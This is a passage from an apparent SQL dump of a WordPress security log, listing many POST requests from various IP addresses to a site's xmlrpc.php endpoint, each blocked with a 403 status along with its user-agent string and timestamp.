Safari\\/537.36\"}','6hHOSoe3wPZF2dKRUqcTX1bV',0,1681268900.0873,807,'','POST',403,0,515,0,1,'',0),('5.231.78.38',99044902,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','Q26ygnvYWJdZUpzDHO9VKARa',0,1681268899.5187,862,'','POST',403,0,515,0,1,'',0),('68.178.145.190',1152553406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','zhCrH7nT2yEPwOAbDIecJM48',0,1681268888.2308,5036,'','POST',403,0,515,0,1,'',0),('184.168.98.120',3098043000,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','2O1urz7jq8csZilTMt3JEhHb',0,1681277895.4248,585,'','POST',403,0,515,0,1,'',0),('148.72.232.52',2487806004,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','vOs5dqVzQUr4geJfjCbYMinN',0,1681277897.0085,575,'','POST',403,0,515,0,1,'',0),('194.4.57.111',3255056751,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','J4nculEPkLzqwfrG1W6bya0p',0,1681277890.6799,1402,'','POST',403,0,515,0,1,'',0),('103.178.57.232',1739733480,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','hZUvpd4m3VHtjAkgQq06fYWr',0,1681277887.3577,4549,'','POST',403,0,515,0,1,'',0),('159.203.161.65',2680922433,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','3eDrjWYh4iUM051sNJHVwpCX',0,1681277276.0878,559,'','POST',403,0,515,0,1,'',0),('62.171.160.188',1051435196,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','lZhpIuey1Wvk6z59UqMjNLiB',0,1681277273.7426,573,'','POST',403,0,515,0,1,'',0),('209.126.106.8',3514722824,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','TzmltqQCDZ5BpWsY4RHUA19i',0,1681277271.3443,991,'','POST',403,0,515,0,1,'',0),('161.97.78.7',2707508743,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','BzV7SKPFgODj0h9GEpiIca14',0,1681282022.0052,611,'','POST',403,0,515,0,1,'',0),('155.94.140.179',2606664883,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','kvDd1Nq58bcMoTUgn0wmQEa9',0,1681282008.8070,768,'','POST',403,0,515,0,1,'',0),('5.161.122.207',94468815,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','gjca71E3qJYOFr5snPy0ikbe',0,1681281997.3875,609,'','POST',403,0,515,0,1,'',0),('93.89.225.177',1566171569,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','BYf6ICiv0DlwmekZz1tRscuq',0,1681281992.0708,577,'','POST',403,0,515,0,1,'',0),('172.104.50.233',2892509929,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','3neVYILf5SotAxRyqvWhw9Hs',0,1681281990.2466,566,'','POST',403,0,515,0,1,'',0),('104.131.97.141',1753440653,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','yRl0cx5Mw4FPWQ1IaD2GN7Uk',0,1681281982.7552,4123,'','POST',403,0,515,0,1,'',0),('91.206.200.117',1540278389,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','AckebB0pUG96JLMf7PQZHt1n',0,1681281984.8141,1550,'','POST',403,0,515,0,1,'',0),('104.247.108.18',1761045522,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','wh7sjHGfOIgvSuaAmTkDrF5N',0,1681281303.3918,1352,'','POST',403,0,515,0,1,'',0),('159.65.152.207',2671876303,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','MUHqhnIrtdpymliPjx19oKBC',0,1681281302.6061,1643,'','POST',403,0,515,0,1,'',0),('67.222.130.10',1138655754,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','8mohlzMp6JVaj12KnUgvtDOe',0,1681281283.0044,657,'','POST',403,0,515,0,1,'',0),('194.4.57.111',3255056751,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','w7USIj9Py3V8TAeukQoJNZMc',0,1681281290.3733,2105,'','POST',403,0,515,0,1,'',0),('78.46.234.36',1311697444,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','gnq7WBiL39ZkDry4NHVPdRtf',0,1681281282.1081,605,'','POST',403,0,515,0,1,'',0),('104.152.110.52',1754820148,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','YP2CKBVHEfLQjW3yMuxq8Ncr',0,1681281272.1001,1708,'','POST',403,0,515,0,1,'',0),('95.216.93.102',1608015206,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','DbHysl0ke2goGjSFUOmrMJ3K',0,1681281269.7048,586,'','POST',403,0,515,0,1,'',0),('212.90.148.14',3562705934,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','ijzh03IHBvaRFUlQCnm91Npq',0,1681281259.4492,3665,'','POST',403,0,515,0,1,'',0),('68.178.145.190',1152553406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','SUehMTkjWt56yVdKsH8qDQu1',0,1681281262.6809,984,'','POST',403,0,515,0,1,'',0),('103.178.57.232',1739733480,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','9Si6oVJx07FeXa2GTEYlNbg5',0,1681281260.0877,3025,'','POST',403,0,515,0,1,'',0),('149.129.34.43',2508268075,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','vZxCTpQ60gD3NumHK2As1Gin',0,1681286099.5720,572,'','POST',403,0,515,0,1,'',0),('47.242.33.63',804397375,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','4PAQgvOWRKNBfetTFblnY5uE',0,1681286095.7894,588,'','POST',403,0,515,0,1,'',0),('203.154.71.195',3415885763,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','GcwUdJt4LTAIpBenhQz5xvEq',0,1681286093.5739,1279,'','POST',403,0,515,0,1,'',0),('5.187.50.29',96154141,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','IOlqHwFmoUYQP47a2dKRfpWx',0,1681286082.6907,551,'','POST',403,0,515,0,1,'',0),('54.36.172.75',908373067,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','DufoRncTCdeWEJ6ZySlqrX0m',0,1681286081.9562,609,'','POST',403,0,515,0,1,'',0),('103.141.97.148',1737318804,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','4wuON1U3ifXFPKDQyCMSWvaI',0,1681286080.8780,576,'','POST',403,0,515,0,1,'',0),('172.104.50.233',2892509929,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','WuSrX9FdATVQhb41olyvMgak',0,1681286071.8202,2044,'','POST',403,0,515,0,1,'',0),('210.65.139.75',3527510859,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','Z8qi3JjAaYNSldMRtGbOhmQ9',0,1681286068.8509,4705,'','POST',403,0,515,0,1,'',0),('66.29.132.22',1109230614,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','lgbNFcznHraJowC570fpsVS2',0,1681290339.6972,684,'','POST',403,0,515,0,1,'',0),('95.216.93.102',1608015206,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','yoB39VunigAYrfckPMREx285',0,1681290343.7288,636,'','POST',403,0,515,0,1,'',0),('85.236.153.74',1441569098,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','poVWSE3TMmZXA9zD0ecLkPOg',0,1681290338.2307,614,'','POST',403,0,515,0,1,'',0),('184.168.98.120',3098043000,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','XQn5MCYUeAGdKm4O6khlL0xB',0,1681290331.9382,1450,'','POST',403,0,515,0,1,'',0),('68.178.145.190',1152553406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','y08FWBqamRTZHhjxKcgObSsA',0,1681286425.9326,573,'','POST',403,0,515,0,1,'',0),('119.23.40.161',1998006433,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','sZea6mwSkMvID5cNF4xY8iW2',0,1681286419.0522,558,'','POST',403,0,515,0,1,'',0),('103.178.57.232',1739733480,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','HynrhS7GgC2KPsAXezpOxN68',0,1681286417.6618,577,'','POST',403,0,515,0,1,'',0),('192.53.170.189',3224742589,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','bA1Iw2aULdfeYyFq5RNkSs46',0,1681286411.0778,651,'','POST',403,0,515,0,1,'',0),('103.178.57.232',1739733480,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','DjKaQ6LGHIbMiNuZz7E2Bsh3',0,1681286400.1632,1437,'','POST',403,0,515,0,1,'',0),('178.210.67.162',3000124322,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','MNTvsxd8BLz1r7IHVyCe9bJi',0,1681286409.1607,718,'','POST',403,0,515,0,1,'',0),('68.183.83.210',1152865234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','Orncmf1tByA5ZsYTGxvCu0Xp',0,1681290331.1613,1900,'','POST',403,0,515,0,1,'',0),('146.59.38.213',2453350101,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','Yh6rTLNRvp74xIwnkdXiBU3a',0,1681290330.9771,1977,'','POST',403,0,515,0,1,'',0),('67.23.226.46',1125638702,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','N76BpfZtJdr4Ag3G508loxq9',0,1681290319.0063,687,'','POST',403,0,515,0,1,'',0),('199.16.130.127',3339747967,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','tmDrBGJf9jIMpSlPe4dOTiyk',0,1681290317.5746,635,'','POST',403,0,515,0,1,'',0),('85.236.153.74',1441569098,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','6Qius3RgaVL2CbGcU7NT5m1Z',0,1681290308.8680,4082,'','POST',403,0,515,0,1,'',0),('185.19.185.86',3105077590,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','4Bim5M9cDZrsPYQuRjTJqhLW',0,1681290307.7712,4336,'','POST',403,0,515,0,1,'',0),('192.241.166.226',3237062370,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','oYgm6ixkA1tNd8CK9EJ7FVsT',0,1681290308.2697,3834,'','POST',403,0,515,0,1,'',0),('45.130.104.194',763521218,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','xQ4iycBlFm2HqpC17dJLvwoA',0,1681293730.6771,596,'','POST',403,0,515,0,1,'',0),('185.185.89.10',3115931914,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','590L1TVgs62WCrdMmOqPowBy',0,1681293710.9953,1132,'','POST',403,0,515,0,1,'',0),('173.231.207.89',2917650265,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','apx0EDC9PSWrkdt45nTQ8sml',0,1681293708.5091,1393,'','POST',403,0,515,0,1,'',0),('3.34.224.66',52617282,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','5m0gdbfGPTRQiWwKM27JrEAv',0,1681293702.4615,1280,'','POST',403,0,515,0,1,'',0),('157.90.169.39',2639964455,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','s0gF82eqS6mQa9ctPOTjCIoy',0,1681293702.2406,1346,'','POST',403,0,515,0,1,'',0),('81.181.130.56',1370849848,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','XF081oHlIpL4qvdKO3keVGnA',0,1681293681.5633,632,'','POST',403,0,515,0,1,'',0),('54.37.121.239',908425711,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','4XRI7hHmesYbqwLTyUDnOKPg',0,1681293677.5180,639,'','POST',403,0,515,0,1,'',0),('172.104.50.233',2892509929,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','Z2xkSdnQyslMVXT1KJjPvtWC',0,1681301555.1344,530,'','POST',403,0,515,0,1,'',0),('210.65.139.75',3527510859,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','KFLTfDN3nA5Rq2JEjcvw4QMp',0,1681301544.6357,552,'','POST',403,0,515,0,1,'',0),('163.172.168.158',2746001566,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','G9NaYhPVzsktuvoUZJ8bIwd5',0,1681297933.0295,588,'','POST',403,0,515,0,1,'',0),('74.208.167.173',1255188397,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','QL4ZbcfdxqRIUEs5riaPFH1W',0,1681297927.7599,663,'','POST',403,0,515,0,1,'',0),('144.24.100.136',2417517704,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','LCduXRIx0s4Qc7jrH5A8Fg1S',0,1681297924.2813,673,'','POST',403,0,515,0,1,'',0),('72.10.50.46',1208627758,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','38ciRoqsdOTVwkxpD9IC6PaJ',0,1681297914.4296,607,'','POST',403,0,515,0,1,'',0),('194.4.57.111',3255056751,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','J5dEkAF98jmwI7rfyTZgVb2o',0,1681297910.8978,900,'','POST',403,0,515,0,1,'',0),('5.187.50.29',96154141,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','D70uiIBbndt3QpGsoXAVFWMr',0,1681297907.1937,625,'','POST',403,0,515,0,1,'',0),('155.94.140.179',2606664883,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','8bjHJRI6V3STUm1izBdP9Fo4',0,1681297894.5931,578,'','POST',403,0,515,0,1,'',0),('41.204.202.44',701286956,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','fRo7UH42BtQTObGCpmKYu9z8',0,1681297889.3620,701,'','POST',403,0,515,0,1,'',0),('149.129.53.70',2508272966,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','Tnat34cegJmoYCE2X8V6uARd',0,1681297878.7062,3901,'','POST',403,0,515,0,1,'',0),('68.178.224.245',1152573685,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','izqwmP7dF2LxEMZJe6yvHQOf',0,1681301537.9285,583,'','POST',403,0,515,0,1,'',0),('182.50.151.63',3056768831,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','57UQSYPi9dGq0ukWFnCyNwJL',0,1681301533.4742,610,'','POST',403,0,515,0,1,'',0),('192.64.117.87',3225449815,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','RXs6BcgUV7xnrKkCWFtm0ETd',0,1681301532.7246,656,'','POST',403,0,515,0,1,'',0),('185.98.5.176',3110208944,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','Quzd8F6betxqK3JVyvECNYrc',0,1681301527.4145,555,'','POST',403,0,515,0,1,'',0),('94.124.93.44',1585208620,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','FOdrJW8AxLfBmzRsNHUqcjgS',0,1681301524.1363,562,'','POST',403,0,515,0,1,'',0),('149.129.53.70',2508272966,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','9WreB2YZR7dSGANslqanoyXV',0,1681301516.9538,855,'','POST',403,0,515,0,1,'',0),('193.123.87.139',3246086027,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','KkVF3rZYdAXbUjxQoIy0SsHm',0,1681301518.4767,667,'','POST',403,0,515,0,1,'',0),('51.195.105.117',868444533,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','jYdHTEZtOeMB1GJv5DlQk06F',0,1681306376.1865,575,'','POST',403,0,515,0,1,'',0),('173.231.207.89',2917650265,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','BdE1JaqziXon7LDkwcFsZ6Hx',0,1681306380.5419,582,'','POST',403,0,515,0,1,'',0),('85.126.154.26',1434360346,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','Q2MLPVU9uYcZg5Fljoa807xE',0,1681305532.8993,607,'','POST',403,0,515,0,1,'',0),('103.178.57.232',1739733480,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','vF6ndp0t5ORwNrfXK8gCI3GP',0,1681306369.7895,903,'','POST',403,0,515,0,1,'',0),('104.215.82.71',1758941767,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','rVW2Rbvy86BY3HSEl5waGZ0O',0,1681305528.3172,1183,'','POST',403,0,515,0,1,'',0),('116.203.79.170',1959481258,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','RChSGZrdYVLiqlbwMWHsA1ty',0,1681305523.2089,560,'','POST',403,0,515,0,1,'',0),('162.213.255.56',2731933496,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 